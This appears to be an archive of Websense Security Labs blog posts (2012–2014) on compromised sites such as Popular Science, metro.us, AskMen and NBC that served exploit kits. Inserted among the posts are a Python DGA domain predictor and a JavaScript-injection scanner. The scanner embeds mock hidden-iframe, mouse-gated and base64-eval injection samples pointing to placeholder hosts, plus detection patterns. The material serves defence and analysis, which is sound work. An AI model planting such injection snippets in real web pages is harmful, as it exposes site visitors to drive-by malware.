Websense Security Labs Blog

Websense Security Labs discovers, investigates and reports on advanced Internet threats that traditional security
research methods miss.


Compromise tagged in these posts

Official Website of Popular Science Compromised

Posted: 28 Oct 2014 06:25 PM | AToro | no comments


Websense® ThreatSeeker® Intelligence Cloud has detected that the official website of Popular Science has been compromised and is serving malicious code. Popular Science is a well-established monthly magazine with a readership of more than a million, focusing on making science and technology subjects accessible to the general reader. The site is injected with malicious code that redirects users to websites serving exploit code, which subsequently drops malicious files on each victim's computer. Websense Security Labs™ has contacted the IT team of Popular Science with a notification regarding the compromise.

The main page of Popular Science on October 28, 2014:

Websense customers are protected from this threat by ACE, our Advanced Classification Engine, at the following stages of the seven stages an advanced threat goes through when attempting to steal your data:

Stage 2 (Lure) - ACE has detection for the compromised websites.
Stage 4 (Exploit Kit) - ACE has detection for the malicious code that attempts to execute this cyber attack.

Analysis

The website has been injected with a malicious iFrame, which automatically redirects the user to the popular RIG Exploit Kit. The same Exploit Kit has been used in the compromise of METRO's website as well. The exploit kit launches various exploits against the victim which, if successful, will result in a malicious executable dropped on the user's system.

The injected iFrame:

In most cases, malicious injections redirect the user to a TDS, which then further redirects to the exploit kit's landing page. However, as is often the case with the RIG Exploit Kit, the injected code sends the victim directly to the landing page.

Obfuscated RIG Exploit Kit landing page:

The exploit kit landing page is heavily obfuscated to make analysis and detection more difficult. Before launching any exploit, the RIG Exploit Kit uses the CVE-2013-7331 XMLDOM ActiveX control vulnerability to list antivirus (AV) software on the target system.

Checking for AV:

This technique has been used by a number of exploit kits recently, most notably the Nuclear and Angler exploit kits. If the user doesn't have any of the checked AVs installed, then the exploit kit proceeds to evaluate the installed plug-ins and their versions, in particular Flash, Silverlight, and Java. If a vulnerable plug-in is found, the appropriate exploit is launched.

De-obfuscated script launching Java Exploit:

High-Level Stats: Who is impacted by this injection?

Websense telemetry indicates that this type of injection is widespread across the globe. Multiple industries are seen to be continuously affected by this threat.

Affected countries:

Affected industries:

Conclusion

As we mentioned in the past, compromising popular web pages is a popular technique used by cyber criminals to launch their attacks. It is important that users employ advanced security products that can protect them at various stages of the attacks.

METRO.US Website Compromised to Serve Malicious Code

Posted: 22 Jul 2014 04:18 PM | Ran Mosessco | no comments


Websense® ThreatSeeker® Intelligence Cloud has detected that the U.S. version of the Metro International website (metro.us) has been compromised and is serving malicious code. Metro newspaper editions are distributed in high-traffic commuter zones or in public transport networks. In the U.S., Metro is published in New York, Boston, and Philadelphia, and is "written and designed for young and ambitious professionals." The U.S. website has over 1 million visitors a month.

When a visitor goes to the main page, metro.us redirects to metro.us/newyork/. That page is injected with a malicious iFrame that redirects users to websites serving exploit code, which subsequently drops malicious files on the victim's computer. Websense Security Labs™ has contacted the IT team of metro.us with a notification regarding the compromise, and they are investigating the issue. Please note that in the UK there is an unrelated Metro publication (Associated Newspapers), which is not linked to the campaign in question.

metro.us main page as of 22 July 2014:

SimilarWeb.com statistics for metro.us:

Websense customers are protected from this threat by ACE, our Advanced Classification Engine, at the following stages:

Stage 2 (Lure) - ACE has detection for the compromised websites.
Stage 3 (Redirect) - ACE has detection for the injected code that redirects the user to the exploit page.
Stage 4 (Exploit Kit) - ACE has detection for the malicious code that attempts to execute this cyber attack.
Stage 5 (Dropper Files) - ACE has detection for the binary files associated with this attack.
Stage 6 (Call Home) - Communication to the associated C&C server is prevented.

Analysis

The injected code has been found in multiple locations within the main website. When a user browses to the main website, the injected code loads automatically, and silently redirects the user through a TDS (Traffic Distribution System or Traffic Direction System) to a website hosting the RIG Exploit Kit. The exploit kit tries to load exploit code for various vulnerabilities, in order to drop a malicious executable on the victim's computer.

Here is a sample of the injected iFrame (which was found on multiple pages on metro.us):

The redirection target from the iFrame (hxxp://fsbook.us/?mt) is part of the TDS. It sets a cookie (to thwart repeated analysis attempts), then redirects to hxxp://fsbook.us/link.php:

hxxp://fsbook.us/link.php in turn redirects to the RIG Exploit Kit landing page:

RIG Exploit Kit

RIG "came on the scene" around April 2014, and was heavily used to distribute ransomware such as Cryptowall. According to Websense ThreatSeeker Intelligence Cloud telemetry, as expected for this specific campaign, most of the victims come from the U.S. and Canada, but let's take a broader look at the geographic telemetry from the RIG Exploit Kit in the last 2 months:

Top 10 Countries affected by RIG Exploit Kit

Country          Percent of Total
United States    32.36%
Canada...

The official website of AskMen is compromised to serve malicious code

Posted: 23 Jun 2014 02:55 PM | AToro | no comments


Websense® ThreatSeeker® Intelligence Cloud has detected that the official website of AskMen (at www.askmen.com), a popular free online men's web portal, has been compromised and injected with malicious "drive by" code that appears to be part of a mass-injection attack. According to similarweb.com, AskMen's website has more than 10 million visitors each month. The injected code redirects a user to a website serving exploit code, which subsequently drops malicious files on the victim's computer. Websense Security Labs™ has contacted the host master of askmen.com with a notification regarding the compromise.

Update: We've been working with Ziff Davis' web security team regarding the compromise; as of today (7th July 2014) we verified with our processes that the website is clean when checked at 14:00 BST and does not serve malicious code. This is not a guarantee the website will continue to be clean. We will continue to monitor the website and update the blog if needed.

AskMen's main page as of 23 June 2014:

SimilarWeb.com statistics for AskMen:

Websense customers are protected from this threat with ACE, our Advanced Classification Engine, at the following stages:

Stage 2 (Lure) - ACE has detection for the compromised websites.
Stage 3 (Redirect) - ACE has detection for the injected code that redirects the user to the exploit page.
Stage 4 (Exploit Kit) - ACE has detection for the malicious code that attempts to execute this cyber-attack.
Stage 5 (Dropper Files) - ACE has detection for the binary files associated with this attack.
Stage 6 (Call Home) - Communication to the associated C&C server is prevented.

Analysis

The injected code has been found in multiple locations within the main website as well as in localized versions of it, like au.askmen.com. When a user browses to the main website, the injected code loads automatically and silently redirects the user to a website serving the actual exploit code. The injected code is obfuscated and can be found at the bottom of legitimate JavaScript pages on AskMen's website.

The injected code on AskMen's website:

How DGA is used to redirect the user

The obfuscation used here is a simple base64 encoding, which can be easily de-obfuscated to reveal a redirect to a website generated by a domain generation algorithm (DGA), as well as the DGA itself.

De-obfuscated JavaScript code:

What the above code does is basically this: it takes the current date (year, month, and day) and uses a CRC32 algorithm as a hash function to hash that data, and the result ends up being the domain name. This means that a new domain will be generated every day, and as we know how the algorithm works, we can easily predict future domains. For example, the domains that will be generated in the next 7 days (from 24 to 30 June) can be seen below.

Exploit page URLs from 24 to 30 June:

The redirect takes the unsuspecting user to a heavily obfuscated page serving a Java exploit (most likely CVE...
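The defensive value of a reversed date-based DGA is exactly what the post does above: compute the domains for the coming days and block them before they are used. The script below is an added example, not the blog's code and not the AskMen injection itself. The page does not reproduce the exact CRC32 input string or the TLD the real DGA used, so the zero-padded YYYYMMDD seed, the 8-hex-digit label and the reserved `.invalid` placeholder TLD are assumptions; the shape of the technique (date in, CRC32 out, one domain per day) is what the post describes.

```python
import zlib
from datetime import date, timedelta

# Assumption: the hash input is the zero-padded calendar date. The real AskMen
# DGA's exact input string and TLD are not reproduced on the page; ".invalid"
# is a reserved placeholder TLD (RFC 2606) so that nothing here resolves.
PLACEHOLDER_TLD = ".invalid"


def date_seed(day: date) -> bytes:
    """Seed the hash with year, month and day, as the post describes."""
    return f"{day.year:04d}{day.month:02d}{day.day:02d}".encode("ascii")


def dga_domain(day: date, tld: str = PLACEHOLDER_TLD) -> str:
    """CRC32 of the seed, as 8 lowercase hex digits, becomes the host label."""
    digest = zlib.crc32(date_seed(day)) & 0xFFFFFFFF
    return f"{digest:08x}{tld}"


def predict_domains(start_iso: str, days: int) -> list[str]:
    """Domains for `days` consecutive days starting at start_iso (YYYY-MM-DD)."""
    start = date.fromisoformat(start_iso)
    return [dga_domain(start + timedelta(days=i)) for i in range(days)]


def blocklist_window(today_iso: str, lookback: int = 1, lookahead: int = 7) -> set[str]:
    """Domains to pre-block: yesterday (clock skew), today and the next week."""
    start = date.fromisoformat(today_iso) - timedelta(days=lookback)
    return set(predict_domains(start.isoformat(), lookback + 1 + lookahead))


def matches_dga(hostname: str, today_iso: str, lookback: int = 1, lookahead: int = 7) -> bool:
    """Proxy/DNS log check: would this DGA emit `hostname` around today?"""
    return hostname.lower().rstrip(".") in blocklist_window(today_iso, lookback, lookahead)


if __name__ == "__main__":
    # The post listed the domains for 24-30 June 2014; the same window is used here.
    for host in predict_domains("2014-06-24", 7):
        print(host)
```

The lookback day matters in practice: a victim whose clock is behind the attacker's will still contact yesterday's domain, so a blocklist built only from today onward leaves a gap. Once the real seed format is recovered from a sample, only `date_seed` and the TLD need to change.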

Cyber criminals expand use of CVE-2014-0322 before Patch Tuesday

Posted: 10 Mar 2014 01:54 PM | Elad Sharf | no comments


In advance of the patch for the Internet Explorer zero-day referenced by CVE-2014-0322, which will be released on Patch Tuesday, March 11, we thought it would be helpful to look at how this exploit was utilized in the lure stage, since this may unveil some of the tactics used by crimeware and targeted attack actors in this day and age. We've seen this latest zero-day employed in targeted attacks involving a cybersquatted domain that appeared to target the French Aerospace Association, as we described in our previous blog post on the subject. Since then, exploit instances utilizing CVE-2014-0322 have been carried out in crimeware attacks in the wild, and it seems that the exploit source code used in the initial attacks was made available publicly, which contributed to the usage of the zero-day. The exploit code's availability in the public domain led to additional exploit instances popping up in the wild, seen coming from compromised websites, by actors that were looking to make a quick profit from the security hole. In this blog, we're going to take a look at the initial cybersquatted website used to employ the zero-day and the different high-profile websites that served the zero-day for crimeware propagation. Specifically, we're going to look at the lure stage of the attacks to understand how code was used in that stage with the ultimate aim of redirecting victims to the exploit.

Top websites seen injected with malicious code leading to the exploit utilizing CVE-2014-0322:

gifas.assso.net - Impersonating the GIFAS French Aerospace Association website (http://gifas.asso.fr), hosted in Santa Clara, CA
hatobus.co.jp - Japanese travel website, hosted in Tokyo, Japan
english.com.tw - Taiwanese English school, hosted in San Antonio, Texas, USA
chemistry.hku.hk - Hong Kong University Chemistry Dept, hosted in Hong Kong, China
vfw.org - Veterans of Foreign Wars, hosted in Blue Springs, Missouri, USA

The initial lure and attack vector - cybersquatted domain @ hxxp://gifas.assso.net

The lure in the initial attacks appears to have been a cybersquatted domain, hxxp://gifas.assso.net, taking advantage of the legitimate domain, hxxp://gifas.asso.fr, that belongs to the French Aerospace Association. The attack effectively employed the fake domain with some copied content from the legitimate website, along with an additional iFrame that led to the exploit located on the same host at hxxp://gifas.assso.net/include.html. We can see that there are still references on the cybersquatted website showing that the code was copied from another website, in the form of a "watermark" tag below the iFrame that reads <!-- saved from ...

The fake gifas.assso.net is hosted on IP address 147.255.229.61. This IP seems to host some other hosts with malicious code. We found that the IP hosted update19.homelinux.org, which is an exact replica of gifas.assso.net and is probably a test bed before launching the actual attack.

High-profile compromises utilizing...

'GWload' - The 'Social Engineering' Based Mass Injection Making Its Rounds

Posted: 28 Oct 2013 07:30 PM | Elad Sharf | no comments


Websense® Security Labs™ ThreatSeeker® Intelligence Cloud has identified that a new mass injection campaign is making its rounds, compromising and injecting content into tens of thousands of legitimate websites. This campaign is an evolution and expansion of an existing injection campaign that Websense® Security Labs™ has been monitoring since January of this year. Our telemetry shows that, to date, at least 40,000 compromised pages have occurred on the Web, redirecting and tricking users into installing rogue software. We see parallels between the injected websites and the websites that were affected by the "cookiebomb" mass injection, which was mostly associated with delivering "ransomware" payloads. (Our blog on the CookieBomb attack is here.)

Let's get back to GWload... We've made three key observations about this campaign. The first is the use of a social engineering technique to lure users into downloading malicious and undesirable content. Although most website injections in the wild redirect to exploit websites, this dominant campaign seems to shift the focus to using a social engineering technique, rather than exploits, to get unwanted content installed on victims' machines. Our second observation is that the time of emergence of this campaign coincides with the arrest of the Blackhole Exploit Kit author 'Paunch,' which could explain the change in mass injection tactics, as actors move from serving exploits to social engineering. This shows that the cyber underground may have contingency plans in place to adapt and react quickly to change. Our third key observation is that the campaign employs an 'end to end' infrastructure of legitimate websites. These legitimate websites become compromised so that they ultimately serve rogue content.

The cyber criminals deploy code to defeat ad-blockers and code that 'locks content' and access to the website until a certain action is complete (a technique that in the past has been used with Cost per Action (CPA) lead-based scams on the Facebook platform). To be clear, conducting CPAlead campaigns is not illegal; however, using CPAlead advertising methods that deceive users is illegal. The ultimate aim of the lure is to install rogue software that compensates the actors through an affiliation program. In this blog we're going to cover the different aspects of this mass injection campaign and share relevant telemetry.

Executive Summary

Thousands of legitimate web pages are compromised in a mass injection campaign we dubbed 'GWload' and detected as early as the week of the 14th of October. The campaign employs a social engineering technique to lure users into downloading rogue content. Most mass injections found in the wild typically redirect to exploit websites; employing a social engineering technique instead of exploits seems to be a shift in focus to push software installations, adware, and spyware without the user's consent...

Honeyclient Evasion Techniques, Bible.org Case

Posted: 25 Feb 2013 03:55 AM | Elad Sharf | 1 comment(s)


Hot on the heels of the NBC.com hack last week, Websense® Security Labs™ researchers were alerted by SANS to another high profile website compromise on Friday: bible.org. It appears that the offending code has now been removed from the bible.org website. At first glance, this seemed to be a run-of-the-mill "compromise, redirect, exploit" chain; however, closer analysis revealed the use of an interesting Honeyclient evasion technique.

Honeyclients allow the profiling of websites in a heuristic and automated way; testing a website with a Honeyclient usually takes longer than signature-based solutions, but the results are much more accurate, especially when new zero-day code or a new emerging threat needs to be flagged up and requires scrutiny. Usually, Honeyclients run on top of virtual machine sandboxes: evasion techniques allow malicious code to become more aware of its running environment and to check whether it's in a virtual environment, or likely to be an 'analysis' environment, before actually running malicious code.

This snippet of code is the entirety of the Honeyclient evasion attempt. As the method name suggests, the function 'jsstatic' will only be called once the event handler registers the movement of the user's mouse over the document (page). Obviously, a primitive Honeyclient will have no mouse movement emulation, so the offending function that leads to exploit code will never be called, and the Honeyclient will never alert on it.

Let's take a closer look at the jsstatic function:

The first part of this function definition is simply a sentry variable, to stop the function being executed indefinitely with each new onmousemove event; the global variable astatf is defined as 0 in an earlier part of the script. The next part simply creates the iFrame, which is then executed as if it had just been injected into the page, as per a normal compromise.

This technique is quite primitive and showcases the infancy of this type of Honeyclient evasion technique. The plethora of event handling methods available means this technique is not going to go away anytime soon, and is likely only going to get more complex and inventive.

In summary: the use of such techniques ultimately aids malicious code in remaining undetected for longer periods of time and thus increases its chances of bypassing security products undetected. The technique described in this blog is simple and allows redirection to exploits only if a mouse movement is detected, an action that is often associated with an actual person interacting with a website and often not emulated by primitive Honeyclients. Why are the attackers using this technique instead of the normal drive-by technique we usually see? Probably because they wanted to make the attack more stealthy, as attacks like this wouldn't be picked up by automated behavioral analysis systems. That's why multiple layers of defense are needed...

NBC.com Compromised

Posted: 22 Feb 2013 01:05 AM | Patrik Runald | no comments


Earlier today the main website of NBC and some of their show websites (such as www.jaylenosgarage.com) were compromised and served malicious content to users. The malicious content was inserted as a one-line iframe tag in one of the JavaScript files that gets loaded every time a user visits the page:

This one line of code forces the web browser of every visiting user to download content from the walterjeffers site, which, in turn, redirects the user to two other sites that eventually use an exploit kit to automatically install a malicious file onto the computer. During the few hours the attack was active, we saw several different URLs being used by the attackers. See the screenshot below for the sequence of events as recorded by the replay system we have in Websense Security Labs.

Two vulnerabilities were used to compromise the user's computer. In the above example, we can see a PDF file, but the exploit will also try Java vulnerabilities. If either is successful, a malicious binary from the Citadel family is installed on the machine. This family of malware is a so-called banking Trojan, which is designed to help the cyber criminals steal money from online banking accounts. While the file has very poor coverage from antivirus solutions according to VirusTotal, our Websense ThreatScope technology was able to see it as suspicious and provide a lot of additional details about the behavior of the file. See here for the full report.

Websense customers were proactively protected against the exploit code attack by our real-time analytics specifically designed to prevent exploit kits. NBC has since confirmed that their site has been cleaned up, and it's again safe to visit.
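Three of the posts above describe the same problem from the site owner's side: a legitimate JavaScript file that has grown a malicious tail. AskMen's was a base64 blob decoding to a redirect, bible.org's created the iFrame only after a mouse event (the Honeyclient evasion described above), and NBC's was a single hidden iframe line. The script below is an added triage example, not Websense code and not anything recovered from those sites: it decodes base64 literals so the obfuscation does not hide the iframe, then tags each of the three shapes. The sample scripts are constructed to mirror the posts' descriptions (the `astatf`/`jsstatic` names follow the bible.org write-up; hostnames use the reserved `.invalid` TLD). The regexes are heuristics that a packer can defeat, so hits are leads for a human, not verdicts.

```python
import base64
import re

# Constructed samples modelled on the injections described in the posts above.
SAMPLE_CLEAN = """
var astatf = 0;
document.onmousemove = function () { if (astatf) return; astatf = 1; recordHover(); };
"""

SAMPLE_DIRECT = """
function initMenu() { /* legitimate site code */ }
document.write('<iframe src="http://redirector.invalid/in.php" width="1" height="1" style="visibility:hidden"></iframe>');
"""

SAMPLE_GATED = """
var astatf = 0;
function jsstatic() {
  if (astatf) return;            // sentry: run once, not on every mousemove
  astatf = 1;
  var f = document.createElement('iframe');
  f.style.display = 'none';
  f.src = 'http://landing.invalid/';
  document.body.appendChild(f);
}
document.onmousemove = jsstatic; // fires only for a real (or emulated) mouse
"""

_INJECTED = "document.write('<iframe src=\"http://' + d + '.invalid/\" width=1 height=1></iframe>');"
SAMPLE_B64 = ("function initMenu() { /* legitimate site code */ }\n"
              "eval(atob(\"" + base64.b64encode(_INJECTED.encode()).decode() + "\"));\n")

SAMPLES = {"clean": SAMPLE_CLEAN, "direct-iframe": SAMPLE_DIRECT,
           "event-gated": SAMPLE_GATED, "base64-tail": SAMPLE_B64}

IFRAME_RE = re.compile(r"<iframe\b|createElement\(\s*['\"]iframe['\"]\s*\)", re.I)
HIDDEN_RE = re.compile(
    r"display\s*(?::|=\s*['\"])\s*none"
    r"|visibility\s*(?::|=\s*['\"])\s*hidden"
    r"|(?:width|height)\s*[=:]\s*['\"]?[01](?![0-9])", re.I)
EVENT_GATE_RE = re.compile(r"onmouse(?:move|over|down)\s*=|addEventListener\(\s*['\"]mouse\w+['\"]", re.I)
B64_LITERAL_RE = re.compile(r"['\"]([A-Za-z0-9+/]{40,}={0,2})['\"]")
REDIRECT_RE = re.compile(r"location|\.src\b", re.I)


def decode_base64_blobs(script: str) -> list[str]:
    """Return every long quoted base64 literal that decodes to readable text."""
    out = []
    for blob in B64_LITERAL_RE.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c.isspace() for c in text):
            out.append(text)
    return out


def scan_script(script: str) -> list[str]:
    """Tag the injection shapes present; an empty list means nothing matched."""
    decoded = decode_base64_blobs(script)
    view = script + "\n" + "\n".join(decoded)   # inspect through the obfuscation
    tags = set()
    if any(IFRAME_RE.search(t) or REDIRECT_RE.search(t) for t in decoded):
        tags.add("base64-tail")
    if IFRAME_RE.search(view):
        if HIDDEN_RE.search(view):
            tags.add("hidden-iframe")
        if EVENT_GATE_RE.search(view):
            tags.add("event-gated-iframe")
    return sorted(tags)


def scan_all() -> dict[str, list[str]]:
    return {name: scan_script(text) for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, findings in scan_all().items():
        print(f"{name:14s} {findings or 'no findings'}")
```

The clean sample registers a mouse handler too, so the event-gate pattern alone must not raise an alert; it is the combination with iframe creation that matters. The same lesson applies to a Honeyclient: before judging a page, dispatch synthetic mousemove events and then look for iframes added to the DOM, otherwise the bible.org variant never runs in the sandbox.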

2013 Threat Report: More Than Scary Stats and Chilling Charts

Posted: 13 Feb 2013 08:30 AM | Carl Leonard | no comments


The 2013 Threat Report from the Websense® Security Labs™ is now available.

The report details mobile, social, email and web-based threats, and while it is full of ominous data points, it is a very interesting read. The report is designed to help security professionals keep current with threat trends and improve the effectiveness of existing security solutions. It can also be used to identify and prioritize security gaps that may require new approaches and more innovative strategies.

Creating the report began with the ThreatSeeker® Network, composed of big data clusters used by the WSL to collect and manage up to 5 billion inputs each day from 900 million global endpoints. Malware samples, mobile applications, email content, web links and other information were then passed through deep analysis processes including our Advanced Classification Engine (ACE), which applied over 10,000 different analytics.

...

Forex Website Targeted: Did Cybercrooks Find the Weakest Link in Online Money Management Services?

Posted: 28 Nov 2012 02:29 AM | Gianluca Giuliani | no comments

The Websense® ThreatSeeker® Network has detected that a FOREX trading website was injected with a malicious Java applet, which could install malware on the affected systems of the site's users. FOREX is the foreign exchange market where international currencies are traded, and nowadays, it's used by millions of people around the world.

The targeted website is a popular FOREX website called "Trading Forex," located at hxxp://tradingforex.com. One of the questions raised when encountering such a compromise is whether some cybercriminals are shifting their focus from the mainstream online money management systems of banks and stock exchanges to "easier wins": online systems and services that are likely to be less mature from a security perspective. Another interesting fact is that the backdoor dropped at Trading Forex is written in Visual Basic .NET and requires Microsoft's .NET Framework to be installed and operational on the victim's computer.

Websense customers are protected from these and other threats by ACE, our Advanced Classification Engine.

...

Iranian Firefighters' Website Compromised to Serve VertexNet RAT

Posted: 01 Nov 2012 03:00 AM | Gianluca Giuliani | no comments

Thanks to the Websense® ThreatSeeker™ Network, we have detected that an Iranian website has been compromised to serve a Remote Administration Tool (RAT) called VertexNet. This website does not have a high Alexa rank, but it is one of a few cases that has caught our attention. The targeted website (reachable at the URL hxxp://www.sarifire.ir) seems to be a portal documenting the activities of firefighters in the city of Sari, located in northern Iran. Given Iran's high profile in recent news stories, we decided to analyze this case. At this time, the website still seems to be injected, as shown below:

...